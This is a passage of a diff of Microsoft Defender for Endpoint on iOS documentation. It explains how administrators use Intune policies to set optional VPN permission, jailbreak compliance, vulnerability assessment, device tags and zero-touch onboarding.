- - If user toggles it to `true`, the unsafe site details are sent.
-
-Turning the above privacy controls on or off doesn't impact the device compliance check or conditional access.
-
-> [!NOTE]
-> On Supervised devices with the configuration profile, Microsoft Defender for Endpoint can access the entire URL and if it is found to be phishing, it is blocked.
-> On an Unsupervised device, Microsoft Defender for Endpoint has access to only the domain name, and if the domain is not a phishing URL, it won't be blocked.
-
-## Optional Permissions
-
-Microsoft Defender for Endpoint on iOS enables **Optional Permissions** in the onboarding flow. Currently the permissions required by Defender for Endpoint are mandatory in the onboarding flow. With this feature, admins can deploy Defender for Endpoint on BYOD devices without enforcing the mandatory **VPN Permission** during onboarding. End users can onboard the app without the mandatory permissions and can later review these permissions. This feature is currently present only for enrolled devices (MDM).
-
-### Configure Optional Permission
-
-1. **Admin flow (MDM)** Use the following steps to enable **Optional VPN** permission for enrolled devices.
-
- - In the [Microsoft Intune admin center](https://go.microsoft.com/fwlink/?linkid=2109431), go to **Apps** \> **App configuration policies** \> **Add** \> **Managed devices**.
-
- - Give the policy a name, select **Platform \> iOS/iPadOS**.
-
- - Select **Microsoft Defender for Endpoint** as the target app.
-
- - On the Settings page, select **Use configuration designer** and add **DefenderOptionalVPN** as the key and value type as **Boolean**.
-
- - To enable optional VPN permission, enter value as `true` and assign this policy to users. By default, this value is set to `false`.
- - For users with key set as `true`, the users are able to onboard the app without giving the VPN permission.
-
- - Select **Next** and assign this profile to targeted devices/users.
-
-1. **End User flow** - User installs and opens the app to start the onboarding.
- - If an admin has set up optional permissions, then the user can **Skip** VPN permission and complete onboarding.
- - Even if the user has skipped VPN, the device is able to onboard, and a heartbeat is sent.
- - If VPN is disabled, web protection isn't active.
- - Later, the user can enable web protection from within the app, which installs the VPN configuration on the device.
-
-> [!NOTE]
-> **Optional Permission** is different from **Disable Web Protection**. Optional VPN Permission only helps to skip the permission during onboarding but its available for the end user to later review and enable it. While **Disable Web Protection** allows users to onboard the Defender for Endpoint app without the Web Protection. It cannot be enabled later.
-
-## Jailbreak detection
-
-Microsoft Defender for Endpoint has the capability of detecting unmanaged and managed devices that are jailbroken. These jailbreak checks are done periodically. If a device is detected as jailbroken, these events occur:
--- **High**-risk alert is reported to the Microsoft Defender portal. If device Compliance and Conditional Access is set up based on device risk score, then the device is blocked from accessing corporate data.-- User data on app is cleared. When user opens the app after jailbreaking the VPN profile also is deleted and no web protection is offered.-
-### Configure compliance policy against jailbroken devices
-
-To protect corporate data from being accessed on jailbroken iOS devices, we recommend that you set up the following compliance policy on Intune.
-
-> [!NOTE]
-> Jailbreak detection is a capability provided by Microsoft Defender for Endpoint on iOS. However, we recommend that you setup this policy as an additional layer of defense against jailbreak scenarios.
-
-Follow the steps below to create a compliance policy against jailbroken devices.
-
-1. In the [Microsoft Intune admin center](https://go.microsoft.com/fwlink/?linkid=2109431), go to **Devices** \> **Compliance policies** \> **Create Policy**. Select "iOS/iPadOS" as platform and select **Create**.
-
- :::image type="content" source="media/ios-jb-policy.png" alt-text="The Create Policy tab" lightbox="media/ios-jb-policy.png":::
-
-2. Specify a name of the policy, such as *Compliance Policy for Jailbreak*.
-
-3. In the compliance settings page, select to expand **Device Health** section and select **Block** for **Jailbroken devices** field.
-
- :::image type="content" source="media/ios-jb-settings.png" alt-text="The Compliance settings tab" lightbox="media/ios-jb-settings.png":::
-
-4. In the **Actions for noncompliance** section, select the actions as per your requirements and select **Next**.
-
- :::image type="content" source="media/ios-jb-actions.png" alt-text="The Actions for noncompliance tab" lightbox="media/ios-jb-actions.png":::
-
-5. In the **Assignments** section, select the user groups that you want to include for this policy and then select **Next**.
-
-6. In the **Review+Create** section, verify that all the information entered is correct and then select **Create**.
-
-## Configure custom indicators
-
-Defender for Endpoint on iOS enables admins to configure custom indicators on iOS devices as well. For more information on how to configure custom indicators, see [Manage indicators](/microsoft-365/security/defender-endpoint/manage-indicators).
-
-> [!NOTE]
-> Defender for Endpoint on iOS supports creating custom indicators only for URLs and domains. IP based custom indicators is not supported on iOS.
->
-> For iOS, no alerts are generated on Microsoft Defender XDR when the URL or domain set in the indicator is accessed.
-
-## Configure vulnerability assessment of apps
-
-Reducing cyber risk requires comprehensive risk-based vulnerability management to identify, assess, remediate, and track all your biggest vulnerabilities across your most critical assets, all in a single solution. Visit this [page](next-gen-threat-and-vuln-mgt.md) to learn more about Microsoft Defender Vulnerability Management in Microsoft Defender for Endpoint.
-
-Defender for Endpoint on iOS supports vulnerability assessments of OS and apps. Vulnerability assessment of iOS versions is available for both enrolled (MDM) and unenrolled (MAM) devices. Vulnerability assessment of apps is only for enrolled (MDM) devices. Admins can use the following steps to configure the vulnerability assessment of apps.
-
-### On a Supervised Device
-
-1. Ensure the device is configured in the [Supervised mode](ios-install.md#complete-deployment-for-supervised-devices).
-
-1. To enable the feature in the [Microsoft Intune admin center](https://go.microsoft.com/fwlink/?linkid=2109431), go to **Endpoint Security** \> **Microsoft Defender for Endpoint** \> **Enable App sync for iOS/iPadOS devices**.
-
- :::image type="content" source="media/tvm-app-sync-toggle.png" alt-text="App sync toggleSup" lightbox="media/tvm-app-sync-toggle.png":::
-
-> [!NOTE]
-> To get the list of all the apps including unmanaged apps, the admin has to enable **Send full application inventory data on personally owned iOS/iPadOS devices** in the Intune Admin Portal for the supervised devices marked as "Personal".
-> For the supervised devices marked as "Corporate" in the Intune Admin Portal, the admin need not enable **Send full application inventory data on personally owned iOS/iPadOS devices**.
-
-### On an Unsupervised Device
-
-1. To enable the feature in the [Microsoft Intune admin center](https://go.microsoft.com/fwlink/?linkid=2109431), go to **Endpoint Security** \> **Microsoft Defender for Endpoint** \> **Enable App sync for iOS/iPadOS devices**.
-
- :::image type="content" source="media/tvm-app-sync-toggle.png" alt-text="App sync toggle" lightbox="media/tvm-app-sync-toggle.png":::
-
-1. To get the list of all the apps including unmanaged apps, enable the toggle **Send full application inventory data on personally owned iOS/iPadOS devices**.
-
- :::image type="content" source="media/tvm-full-app-data.png" alt-text="Full App Data" lightbox="media/tvm-full-app-data.png":::
-
-1. Use the following steps to configure the privacy setting.
- - Go to **Apps** \> **App configuration policies** \> **Add** \> **Managed devices**.
- - Give the policy a name, **Platform** \> **iOS/iPadOS**.
- - Select **Microsoft Defender for Endpoint** as the target app.
- - In Settings page, select Use configuration designer and add **DefenderTVMPrivacyMode** as the key and value type as **String**.
- - To disable privacy and collect the list of apps installed, enter value as `False` and assign this policy to users.
- - By default, this value is set to `True` for unsupervised devices.
- - For users with key set as `False`, Defender for Endpoint will send the list of apps installed on the device for vulnerability assessment.
- - Click **Next** and assign this profile to targeted devices/users.
- - Turning the above privacy controls on or off will not impact the device compliance check or conditional access.
-
-1. Once the config is applied, end-user will need to open the app to **Approve** the privacy setting.
- - Privacy approval screen will come only for unsupervised devices.
- - Only if end-user approves the privacy, the app information is sent to the Defender for Endpoint console.
-
- :::image type="content" source="media/tvm-user-privacy2.png" alt-text="Screenshot of the end user privacy screen." lightbox="media/tvm-user-privacy2.png":::
-
-Once the client versions are deployed to target iOS devices, the processing will start. Vulnerabilities found on those devices will start showing up in the Defender Vulnerability Management dashboard. The processing might take few hours (max 24 hours) to complete. Especially for the entire list of apps to show up in the software inventory.
-
-> [!NOTE]
-> If you're using SSL inspection solution within your iOS device, please allow list these domain names **securitycenter.windows.com** (in commercial environment) and **securitycenter.windows.us** (in GCC environment) for TVM feature to work.
-
-## Disable sign out
-
-Defender for Endpoint on iOS supports deployment without sign out button in the app to prevent users from signing out of the Defender app. This is important to prevent users from tampering the device.
-
-This configuration is available for both the enrolled (MDM) devices as well as unenrolled (MAM) devices. Admins can use the following steps to configure the Disable sign out
-
-### Configure Disable sign out
-
-**For enrolled devices(MDM)**
-
-1. In the Microsoft Intune admin center, navigate to Apps \> App configuration policies \> Add \> Managed devices.
-1. Give the policy a name, select Platform \> iOS/iPadOS
-1. Select Microsoft Defender for Endpoint as the target app.
-1. In Settings page, select Use configuration designer and add **DisableSignOut** as the key and value type as **String**.
-1. By default, DisableSignOut = false.
-1. Admin needs to make **DisableSignOut = true** to disable the sign-out button in the app. Users will not see the sign out button once the policy is pushed.
-1. Click Next and assign this policy to targeted devices/users.
-
-**For unenrolled devices(MAM)**
-
-1. In the Microsoft Intune admin center, navigate to Apps > App configuration policies > Add > Managed apps.
-1. Give the policy a name.
-1. Under the Select Public Apps, choose Microsoft Defender for Endpoint as the target app.
-1. In Settings page, add **DisableSignOut** as the key and value as **true**, under the General Configuration Settings.
-1. By default, DisableSignOut = false.
-1. Admin needs to make **DisableSignOut = true** to disable the sign-out button in the app. Users will not see the sign out button once the policy is pushed.
-1. Click Next and assign this policy to targeted devices/users.
-
->[!Important]
->This feature is in Public Preview. The following information relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
-
-## Device Tagging
-
-Defender for Endpoint on iOS enables bulk tagging the mobile devices during onboarding by allowing the admins to set up tags via Intune. Admin can configure the device tags through Intune via configuration policies and push them to user's devices. Once the User installs and activates Defender, the client app passes the device tags to the Security Portal. The Device tags appear against the devices in the Device Inventory.
-
-This configuration is available for both the enrolled (MDM) devices as well as unenrolled (MAM) devices. Admins can use the following steps to configure the Device tags.
-
-### Configure Device tags
-
-**For enrolled devices(MDM)**
-
-1. In the Microsoft Intune admin center, navigate to Apps \> App configuration policies \> Add \> Managed devices.
-1. Give the policy a name, select Platform \> iOS/iPadOS
-1. Select Microsoft Defender for Endpoint as the target app.
-1. In Settings page, select Use configuration designer and add **DefenderDeviceTag** as the key and value type as **String**.
- - Admin can assign a new tag by adding the key **DefenderDeviceTag** and setting a value for device tag.
- - Admin can edit an existing tag by modifying the value of the key **DefenderDeviceTag**.
- - Admin can delete an existing tag by removing the key **DefenderDeviceTag**.
-
-1. Click Next and assign this policy to targeted devices/users.
-
-**For unenrolled devices(MAM)**
-
-1. In the Microsoft Intune admin center, navigate to Apps > App configuration policies > Add > Managed apps.
-1. Give the policy a name.
-1. Under the Select Public Apps, choose Microsoft Defender for Endpoint as the target app.
-1. In Settings page, add **DefenderDeviceTag** as the key under the General Configuration Settings.
- - Admin can assign a new tag by adding the key **DefenderDeviceTag** and setting a value for device tag.
- - Admin can edit an existing tag by modifying the value of the key **DefenderDeviceTag**.
- - Admin can delete an existing tag by removing the key **DefenderDeviceTag**.
-1. Click Next and assign this policy to targeted devices/users.
-
-> [!NOTE]
-> The Defender app needs to be opened for tags to be synced with Intune and passed to Security Portal. It may take up to 18 hours for tags to reflect in the portal.
-
-## Configure option to send in-app feedback
-
-Customers now have the option to configure the ability to send feedback data to Microsoft within the Defender for Endpoint app. Feedback data helps Microsoft improve products and troubleshoot issues.
-
-> [!NOTE]
-> For US Government cloud customers, feedback data collection is **disabled** by default.
-
-Use the following steps to configure the option to send feedback data to Microsoft:
-
-1. In the [Microsoft Intune admin center](https://go.microsoft.com/fwlink/?linkid=2109431), go to **Apps** \> **App configuration policies** \> **Add** \> **Managed devices**.
-
-1. Give the policy a name, and select **Platform \> iOS/iPadOS** as the profile type.
-
-1. Select **Microsoft Defender for Endpoint** as the target app.
-
-1. On the Settings page, select **Use configuration designer** and add **DefenderFeedbackData** as the key and value type as **Boolean**.
-
- - To remove the ability of end-users to provide feedback, set the value as `false` and assign this policy to users. By default, this value is set to `true`. For US Government customers, the default value is set to 'false'.
-
- - For users with key set as `true`, there is an option to send Feedback data to Microsoft within the app (**Menu** \> **Help & Feedback** \> **Send Feedback to Microsoft**).
-
-1. Select **Next** and assign this profile to targeted devices/users.
-
-## Report unsafe site
-
-Phishing websites impersonate trustworthy websites for the purpose of obtaining your personal or financial information. Visit the [Provide feedback about network protection](https://www.microsoft.com/wdsi/filesubmission/exploitguard/networkprotection) page to report a website that could be a phishing site.
security Ios Install Unmanaged https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/ios-install-unmanaged.md
- Title: Deploy Microsoft Defender for Endpoint on iOS with Mobile Application Management
-description: Describes how to deploy Microsoft Defender for Endpoint on unenrolled iOS devices.
-------- m365-security-- tier3-- mde-ios-- Previously updated : 07/18/2021--
-# Deploy Microsoft Defender for Endpoint on iOS with Mobile Application Management
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-> [!NOTE]
-> Defender for Endpoint on iOS uses a VPN in order to provide the Web Protection feature. This is not a regular VPN and is a local/self-looping VPN that does not take traffic outside the device.
-
-## Configure Microsoft Defender for Endpoint risk signals in app protection policy (MAM)
-
-Microsoft Defender for Endpoint on iOS, which already protects enterprise users on Mobile Device Management (MDM) scenarios, now extends support to Mobile App Management (MAM), for devices that are not enrolled using Intune mobile device management (MDM). It also extends this support to customers who use other enterprise mobility management solutions, while still using Intune for mobile application management (MAM).This capability allows you to manage and protect your organization's data within an application.
-
-Microsoft Defender for Endpoint on iOS threat information is leveraged by Intune App Protection Policies to protect these apps. App protection policies (APP) are rules that ensure an organization's data remains safe or contained in a managed app. A managed application has app protection policies applied to it and can be managed by Intune.
-
-Microsoft Defender for Endpoint on iOS supports both the configurations of MAM
-- **Intune MDM + MAM**: IT administrators can only manage apps using App Protection Policies on devices that are enrolled with Intune mobile device management (MDM).-- **MAM without device enrollment**: MAM without device enrollment, or MAM-WE, allows IT administrators to manage apps using [App Protection Policies](/mem/intune/apps/app-protection-policy) on devices not enrolled with Intune MDM. This means apps can be managed by Intune on devices enrolled with third-party EMM providers.
-To manage apps using in both the above configurations customers should use Intune in the [Microsoft Intune admin center](https://go.microsoft.com/fwlink/?linkid=2109431)
-
-To enable this capability an administrator needs to configure the connection between Microsoft Defender for Endpoint and Intune, create the app protection policy, and apply the policy on targeted devices and applications.
-
-End users also need to take steps to install Microsoft Defender for Endpoint on their device and activate the onboarding flow.
-
-### Pre-requisites
-
-1. **Verify that the Intune connector is enabled in Security portal**. <br> On the [unified security console](https://security.microsoft.com), go to **Settings** > **Endpoints** > **Advanced Features** and ensure that **Microsoft Intune connection** is enabled.
-
- :::image type="content" source="media/enable-intune-connection.png" alt-text="The Defender for Endpoint - Intune connector" lightbox="media/enable-intune-connection.png":::
-
-2. **Verify that the APP connector is enabled in Intune portal**. <br> In the [Microsoft Intune admin center](https://go.microsoft.com/fwlink/?linkid=2109431), go to **Endpoint Security** > **Microsoft Defender for Endpoint** and ensure that the Connection status is enabled.
-
- :::image type="content" source="media/app-settings.png" alt-text="The application settings" lightbox="media/app-settings.png":::
-
-### Create an app protection policy
-
-Block access or wipe data of a managed app based on Microsoft Defender for Endpoint risk signals by creating an app protection policy.
-Microsoft Defender for Endpoint can be configured to send threat signals to be used in app protection policies (APP, also known as MAM). With this capability, you can use Microsoft Defender for Endpoint to protect managed apps.
-
-1. Create a policy <br>
-App protection policies (APP) are rules that ensure an organization's data remains safe or contained in a managed app. A policy can be a rule that is enforced when the user attempts to access or move "corporate" data, or a set of actions that are prohibited or monitored when the user is inside the app.
--
-2. Add apps <br>
- a. Choose how you want to apply this policy to apps on different devices. Then add at least one app. <br>
- Use this option to specify whether this policy applies to unmanaged devices. You can also choose to target your policy to apps on devices of any management state.
-Because mobile app management doesn't require device management, you can protect company data on both managed and unmanaged devices. The management is centered on the user identity, which removes the requirement for device management. Companies can use app protection policies with or without MDM at the same time. For example, consider an employee that uses both a phone issued by the company, and their own personal tablet. The company phone is enrolled in MDM and protected by app protection policies while the personal device is protected by app protection policies only.
-
- b. Select Apps<br>
- A managed app is an app that has app protection policies applied to it, and can be managed by Intune. Any app that has been integrated with the [Intune SDK](/mem/intune/developer/app-sdk) or wrapped by the [Intune App Wrapping Tool](/mem/intune/developer/apps-prepare-mobile-application-management) can be managed using Intune app protection Policies. See the official list of [Microsoft Intune protected apps](/mem/intune/apps/apps-supported-intune-apps) that have been built using these tools and are available for public use.
-
- *Example: Outlook as a managed app*
-
- :::image type="content" source="media/managed-app.png" alt-text="The Microsoft Outlook menu item on the left navigation pane" lightbox="media/managed-app.png":::
-
- Select the **Platform, Apps, Data protection, Access requirements** settings that your organization requires for your policy.
-
- 3.Set sign-in security requirements for your protection policy. <br>
-Select **Setting > Max allowed device threat level** in **Conditional Launch > Device Conditions** and enter a value. This will need to be configured to either Low, Medium, High, or Secured. The actions available to you will be **Block access** or **Wipe data**. Select **Action: "Block Access"**. Microsoft Defender for Endpoint on iOS shares this Device Threat Level.
-
- :::image type="content" source="media/conditional-launch.png" alt-text="The Device conditions pane" lightbox="media/conditional-launch.png":::
-
-4.Assign user groups for whom the policy needs to be applied.<br>
- Select **Included groups**. Then add the relevant groups.
-
-For more information on MAM or app protection policy, see [iOS app protection policy settings](/mem/intune/apps/app-protection-policy-settings-ios).
-
-## Deploy Microsoft Defender for Endpoint for MAM or on unenrolled devices
-
-Microsoft Defender for Endpoint on iOS enables the app protection policy scenario and is available in the Apple app store.
-
-When app protection policies are configured for apps to include device risk signals from Microsoft Defender for Endpoint, users will be redirected to install Microsoft Defender for Endpoint when using such apps. Alternately, users can also install the latest version of the app directly from the Apple app store.
-
-Ensure the device is registered to Authenticator with the same account being used to onboard in Defender for successful MAM registration.
security Ios Install https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/ios-install.md
- Title: Deploy Microsoft Defender for Endpoint on iOS with Microsoft Intune-
-description: Describes how to deploy Microsoft Defender for Endpoint on iOS using an app.
------- m365-security-- tier3-- mde-ios-- Previously updated : 12/18/2020--
-# Deploy Microsoft Defender for Endpoint on iOS with Microsoft Intune
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-investigateip-abovefoldlink)
-
-This topic describes deploying Defender for Endpoint on iOS on Microsoft Intune Company Portal enrolled devices. For more information about Microsoft Intune device enrollment, see [Enroll iOS/iPadOS devices in Intune](/mem/intune/enrollment/ios-enroll).
-
-## Before you begin
--- Ensure you have access to the [Microsoft Intune admin center](https://go.microsoft.com/fwlink/?linkid=2109431).--- Ensure iOS enrollment is done for your users. Users need to have a Defender for Endpoint license assigned in order to use Defender for Endpoint on iOS. Refer to [Assign licenses to users](/azure/active-directory/users-groups-roles/licensing-groups-assign) for instructions on how to assign licenses.--- Ensure the end users have company portal app installed, signed in and enrollment completed.-
-> [!NOTE]
-> Microsoft Defender for Endpoint on iOS is available in the [Apple App Store](https://aka.ms/mdatpiosappstore).
-
-This section covers:
-
-1. **Deployment steps** (applicable for both **Supervised** and **Unsupervised** devices)- Admins can deploy Defender for Endpoint on iOS via Microsoft Intune Company Portal. This step is not needed for VPP (volume purchase) apps.
-
-1. **Complete deployment** (only for Supervised devices)- Admins can select to deploy any one of the given profiles.
- 1. **Zero touch (Silent) Control Filter** - Provides Web Protection without the local loopback VPN and also enables silent onboarding for users. App is automatically installed and activated without the need for user to open the app.
- 1. **Control Filter** - Provides Web Protection without the local loopback VPN.
-
-1. **Automated Onboarding setup** (only for **Unsupervised** devices) - Admins can automate the Defender for Endpoint onboarding for users in two different ways:
- 1. **Zero touch (Silent) Onboarding** - App is automatically installed and activated without the need for users to open the app.
- 1. **Auto Onboarding of VPN** - Defender for Endpoint VPN profile is automatically set up without having the user to do so during onboarding. This step is not recommended in Zero touch configurations.
-
-1. **User Enrollment setup** (only for Intune User Enrolled devices) - Admins can deploy and configure the Defender for Endpoint app on the Intune User Enrolled devices also.
-
-1. **Complete onboarding and check status** - This step is applicable for all enrollment types to ensure app is installed on the device, onboarding is completed and device is visible in the Microsoft Defender portal. It can be skipped for the zero touch (silent) onboarding.
-
-## Deployment steps (applicable for both Supervised and Unsupervised devices)
-
-Deploy Defender for Endpoint on iOS via Microsoft Intune Company Portal.
-
-### Add iOS store app
-
-1. In the [Microsoft Intune admin center](https://go.microsoft.com/fwlink/?linkid=2109431), go to **Apps** > **iOS/iPadOS** > **Add** > **iOS store app** and click **Select**.
-
- :::image type="content" source="media/ios-deploy-1.png" alt-text="The Add applications tab in the Microsoft Intune admin center" lightbox="media/ios-deploy-1.png":::
-
-1. On the **Add app** page, click on **Search the App Store** and type **Microsoft Defender** in the search bar. In the search results section, click on *Microsoft Defender* and click **Select**.
-
-1. Select **iOS 15.0** as the Minimum operating system. Review the rest of information about the app and click **Next**.
-
-1. In the **Assignments** section, go to the **Required** section and select **Add group**. You can then choose the user group(s) that you would like to target Defender for Endpoint on iOS app. Click **Select** and then **Next**.
-
- > [!NOTE]
- > The selected user group should consist of Microsoft Intune enrolled users.
-
- :::image type="content" source="media/ios-deploy-2.png" alt-text="The Add group tab in the Microsoft Intune admin center" lightbox="media/ios-deploy-2.png":::
-
-1. In the *Review + Create* section, verify that all the information entered is correct and then select **Create**. In a few moments, the Defender for Endpoint app should be created successfully, and a notification should show up at the top-right corner of the page.
-
-1. In the app information page that is displayed, in the **Monitor** section, select **Device install status** to verify that the device installation has completed successfully.
-
- :::image type="content" source="media/ios-deploy-3.png" alt-text="The Device install status page" lightbox="media/ios-deploy-3.png":::
-
-## Complete deployment for supervised devices
-
-The Microsoft Defender for Endpoint on iOS app has specialized ability on supervised iOS/iPadOS devices, given the increased management capabilities provided by the platform on these types of devices. It can also provide Web Protection **without setting up a local VPN on the device**. This gives end-users a seamless experience while still being protected from phishing and other web-based attacks.
-
-Admins can use the following steps to configure supervised devices.
-
-### Configure Supervised Mode via Microsoft Intune
-
-Configure the supervised mode for Defender for Endpoint app through an App configuration policy and Device configuration profile.
-
-#### App configuration policy
-
-> [!NOTE]
-> This app configuration policy for supervised devices is applicable only to managed devices and should be targeted for ALL managed iOS devices as a best practice.
-
-1. Sign in to the [Microsoft Intune admin center](https://go.microsoft.com/fwlink/?linkid=2109431) and go to **Apps** \> **App configuration policies** \> **Add**. Select **Managed devices**.
-
- :::image type="content" source="media/ios-deploy-4.png" alt-text="Image of Microsoft Intune admin center4." lightbox="media/ios-deploy-4.png":::
-
-1. In the *Create app configuration policy* page, provide the following information:
- - Policy Name
- - Platform: Select iOS/iPadOS
- - Targeted app: Select **Microsoft Defender for Endpoint** from the list
-
- :::image type="content" source="media/ios-deploy-5.png" alt-text="Image of Microsoft Intune admin center5." lightbox="media/ios-deploy-5.png":::
-
-1. In the next screen, select **Use configuration designer** as the format. Specify the following properties:
- - Configuration Key: `issupervised`
- - Value type: String
- - Configuration Value: `{{issupervised}}`
-
- :::image type="content" source="media/ios-deploy-6.png" alt-text="Image of Microsoft Intune admin center6." lightbox="media/ios-deploy-6.png":::
-
-1. Select **Next** to open the **Scope tags** page. Scope tags are optional. Select **Next** to continue.
-
-1. On the **Assignments** page, select the groups that will receive this profile. For this scenario, it is best practice to target **All Devices**. For more information on assigning profiles, see [Assign user and device profiles](/mem/intune/configuration/device-profile-assign).
-
- When deploying to user groups, a user must sign in to a device before the policy applies.
-
- Click **Next**.
-
-1. On the **Review + create** page, when you're done, choose **Create**. The new profile is displayed in the list of configuration profiles.
-
-#### Device configuration profile (Control Filter)
-
-> [!NOTE]
-> For devices that run iOS/iPadOS (in Supervised Mode), there is custom **.mobileconfig** profile, called the **ControlFilter** profile available. This profile enables Web Protection **without setting up the local loopback VPN on the device**. This gives end-users a seamless experience while still being protected from phishing and other web-based attacks.
->
-> However, the **ControlFilter** profile does not work with Always-On VPN (AOVPN) due to platform restrictions.
-
-Admins deploy any one of the given profiles.
-
-1. **Zero touch (Silent) Control Filter** - This profile enables silent onboarding for users. Download the config profile from [ControlFilterZeroTouch](https://aka.ms/mdeiosprofilesupervisedzerotouch)
-
-2. **Control Filter** - Download the config profile from [ControlFilter](https://aka.ms/mdeiosprofilesupervised).
-
-Once the profile has been downloaded, deploy the custom profile. Follow the steps below:
-
-1. Navigate to **Devices** > **iOS/iPadOS** > **Configuration profiles** > **Create Profile**.
-1. Select **Profile Type** > **Templates** and **Template name** > **Custom**.
-
- :::image type="content" source="media/ios-deploy-7.png" alt-text="Image of Microsoft Intune admin center7." lightbox="media/ios-deploy-7.png":::
-
-1. Provide a name of the profile. When prompted to import a Configuration profile file, select the one downloaded from the previous step.
-1. In the **Assignment** section, select the device group to which you want to apply this profile. As a best practice, this should be applied to all managed iOS devices. Select **Next**.
-
- > [!NOTE]
- > Device Group creation is supported in both Defender for Endpoint Plan 1 and Plan 2.
-
-1. On the **Review + create** page, when you're done, choose **Create**. The new profile is displayed in the list of configuration profiles.
-
-## Automated Onboarding setup (only for Unsupervised devices)
-
-Admins can automate the Defender onboarding for users in two different ways with Zero touch(Silent) Onboarding or Auto Onboarding of VPN.
-
-### Zero-touch (Silent) onboarding of Microsoft Defender for Endpoint
-
-> [!NOTE]
-> Zero-touch cannot be configured on iOS devices that are enrolled without user affinity (user-less devices or shared devices).
-
-Admins can configure Microsoft Defender for Endpoint to deploy and activate silently. In this flow, the administrator creates a deployment profile and the user is simply notified of the installation. Defender for Endpoint is automatically installed without the need for the user to open the app. Follow the steps below to set up zero-touch or silent deployment of Defender for Endpoint on enrolled iOS devices:
-
-1. In the [Microsoft Intune admin center](https://go.microsoft.com/fwlink/?linkid=2109431), go to **Devices** > **Configuration Profiles** > **Create Profile**.
-1. Choose **Platform** as **iOS/iPadOS**, **Profile type** as **Templates** and **Template name** as **VPN**. Select **Create**.
-1. Type a name for the profile and select **Next**.
-1. Select **Custom VPN** for Connection Type and in the **Base VPN** section, enter the following:
- - Connection Name = Microsoft Defender for Endpoint
- - VPN server address = 127.0.0.1
- - Auth method = "Username and password"
- - Split Tunneling = Disable
- - VPN identifier = com.microsoft.scmx
- - In the key-value pairs, enter the key **SilentOnboard** and set the value to **True**.
- - Type of Automatic VPN = On-demand VPN
- - Select **Add** for **On Demand Rules** and select **I want to do the following = Connect VPN**, **I want to restrict to = All domains**.
-
- :::image type="content" source="media/ios-deploy-9.png" alt-text="The VPN profile Configuration page" lightbox="media/ios-deploy-9.png":::
-
- - To mandate that VPN can't be disabled in users device, Admins can select **Yes** from **Block users from disabling automatic VPN**. By default, it's not configured and users can disable VPN only in the Settings.
- - To allow Users to Change the VPN toggle from within the app, add **EnableVPNToggleInApp = TRUE**, in the key-value pairs. By default, users can't change the toggle from within the app.
-
-1. Select **Next** and assign the profile to targeted users.
-1. In the *Review + Create* section, verify that all the information entered is correct and then select **Create**.
-
-Once the above configuration is done and synced with the device, the following actions take place on the targeted iOS device(s):
--- Microsoft Defender for Endpoint will be deployed and silently onboarded and the device will be seen in the Defender for Endpoint portal.-- A provisional notification will be sent to the user device.-- Web Protection and other features will be activated.-
-> [!NOTE]
-> For supervised devices, admins can setup Zero touch onboarding with the new [ZeroTouch Control Filter Profile](#device-configuration-profile-control-filter).
-
-Defender for Endpoint VPN Profile will not be installed on the device and Web protection will be provided by the Control Filter Profile.
-
-### Auto-Onboarding of VPN profile (Simplified Onboarding)
-
-> [!NOTE]
-> This step simplifies the onboarding process by setting up the VPN profile. If you are using Zero touch, you do not need to perform this step.
-
-For unsupervised devices, a VPN is used to provide the Web Protection feature. This is not a regular VPN and is a local/self-looping VPN that does not take traffic outside the device.
-
-Admins can configure auto-setup of VPN profile. This will automatically set up the Defender for Endpoint VPN profile without having the user to do so while onboarding.
-
-1. In the [Microsoft Intune admin center](https://go.microsoft.com/fwlink/?linkid=2109431), go to **Devices** > **Configuration Profiles** > **Create Profile**.
-1. Choose **Platform** as **iOS/iPadOS** and **Profile type** as **VPN**. Click **Create**.
-1. Type a name for the profile and click **Next**.
-1. Select **Custom VPN** for Connection Type and in the **Base VPN** section, enter the following:
- - Connection Name = Microsoft Defender for Endpoint
- - VPN server address = 127.0.0.1
- - Auth method = "Username and password"
- - Split Tunneling = Disable
- - VPN identifier = com.microsoft.scmx
- - In the key-value pairs, enter the key **AutoOnboard** and set the value to **True**.
- - Type of Automatic VPN = On-demand VPN
- - Select **Add** for **On Demand Rules** and select **I want to do the following = Connect VPN**, **I want to restrict to = All domains**.
-
- :::image type="content" source="media/ios-deploy-8.png" alt-text="The VPN profile Configuration settings tab." lightbox="media/ios-deploy-8.png":::
-
- - To require that VPN cannot be disabled on a users' device, Admins can select **Yes** from **Block users from disabling automatic VPN**. By default, this setting not configured and users can disable VPN only in the Settings.
- - To allow Users to Change the VPN toggle from within the app, add **EnableVPNToggleInApp = TRUE**, in the key-value pairs. By default, users cannot change the toggle from within the app.
-
-1. Click **Next** and assign the profile to targeted users.
-1. In the *Review + Create* section, verify that all the information entered is correct and then select **Create**.
-
-## **User Enrollment setup** (only for Intune User Enrolled devices)
-> [!IMPORTANT]
-> User Enrollment for Microsoft Defender on iOS is in public preview. The following information relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
-
-Microsoft Defender iOS app can be deployed on the Intune User Enrolled devices using the following steps.
-
- ### Admin
- 1. Set up User Enrollment Profile in Intune. Intune supports account driven Apple User Enrollment and Apple User Enrollment with Company Portal. Read more about the [comparison](/mem/intune/enrollment/ios-user-enrollment-supported-actions#apple-user-enrollment-methods) of the two methods and select one.
